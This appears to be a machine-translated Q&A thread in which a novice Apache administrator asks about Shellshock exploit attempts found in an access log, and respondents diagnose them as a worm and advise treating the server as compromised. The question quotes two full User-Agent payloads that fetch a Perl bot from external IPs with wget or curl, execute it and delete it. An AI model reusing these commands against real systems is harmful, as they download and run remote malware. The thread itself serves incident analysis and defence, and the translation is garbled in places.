puxando paira o meu apache usando script cgi

Eu sou novato na programação web, então eu configurei um apache2 seview paira minha prática.

Pairece que alguém conseguiu cortair meu server apache. Tenho aviso no meu access.log a seguinte linha:

81.169.174.52 - - [22/Jan/2015:17:24:39 +0200] "GET /cgi-bin/contact.cgi HTTP/1.1" 200 1531 "-" "() { :;};/usr/ bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://202.191.121.230/ou.pl -O /tmp/b.pl;curl -O /tmp/b.pl http://202.191.121.230/ou.pl;perl /tmp/b.pl;rm -rf /tmp/b.pl*\");'" 

e também este:

 80.92.84.168 - - [22/Jan/2015:18:21:08 +0200] "GET /phppath/cgi_wrapper HTTP/1.0" 200 3360 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESSX\";system(\"wget http://74.208.166.12/bot.txt -O /tmp/bot.pl;perl /tmp/bot.pl;rm - rf /tmp/bot.pl\");'" 

Pairece que eles já conseguiram cortair, de acordo com HTTP-200, significa o request concedido.

Quando eu tento "acompanhair" o command na solicitação (executando cada command manualmente):

system(\"wget http://74.208.166.12/bot.txt -O /tmp/bot.pl;perl /tmp/bot.pl;rm - rf /tmp/bot.pl\");'"

Eu posso view que eu tenho sucesso paira download o file 'bot.txt'. quando eu abrir o file 'bot.txt' e vi seu script perl. Eu não sou um monge de perl, mas posso view que é "forking" outro process que cada um tenta abrir portas paira outros serveres. Também vi uma function dentro do código que tenta procurair portas abertas na minha estação.

Minhas perguntas:

  • alguém conhece esse problema?
  • Como posso configurair meu apache2.conf paira evitair tal hacking?

THX

2 Solutions collect form web for “puxando paira o meu apache usando script cgi”

O invasor está tentando explorair a vulnerabilidade do Bash Shellshock . Você pode viewificair se você é vulnerável com alguns testes de linha de command simples (que por si mesmos não são prejudiciais), já estão cobertos em outra publicação de SF:

  • Como testair se meu server é vulnerável ao bug do ShellShock?

Seus registros mostram que eles retornairam 200 códigos de status HTTP, indicando que o Apache atendia as duas solicitações sem erros. Caso cgi_wrapper , o contact.cgi ou o cgi_wrapper crashram, eu esperairia que o Apache retornasse um código de status de 500 (erro interno do server). Isso sugere que ambos os scripts pelo less tentairam explorair Shellshock.

Se você é capaz de determinair que você possui uma viewsão vulnerável do Bash no seu sistema, então acho que é provável que os scripts bot.pl e bot.pl tenham sido baixados e executados no seu sistema. Dado que, você não deve fazer qualquer suposition sobre a integridade do sistema, porque realmente não há como saber o que pode ter sido feito após a invasão inicial. Como você lida com isso é algo que você terá que determinair por conta própria, mas há algumas boas sugestões nesta questão SF:

  • Como lidair com um server comprometido?

Este é um worm espalhador Shellshock clássico.

Se vulnerável, baixe um file .txt (que é um downloader), execute-o, baixe um file .tair, extraie-o, execute o binary interno, que é um rootkit e um scanner.

Aqui, um estudo rápido sobre este comportamento: o que é um real-shellshock-attack-look-like

Mike.

  • O que pode estair causando o seguinte hack?
  • Como eu sei se meu server Linux foi pirateado?
  • Meu server linux foi pirateado. Como faço paira descobrir como e quando foi feito?
  • Quais são os principais passos que fazem análise forense da checkbox do linux depois que foi pirateada?
  • Meu site Wordpress sendo hack modificando o .htaccess
  • Servidor SSH exploração de dia zero - Sugestões paira nos proteger
  • Intervalo de bloqueios de endereços IP
  • Esse server foi pirateado ou apenas tentativas de login? Ver log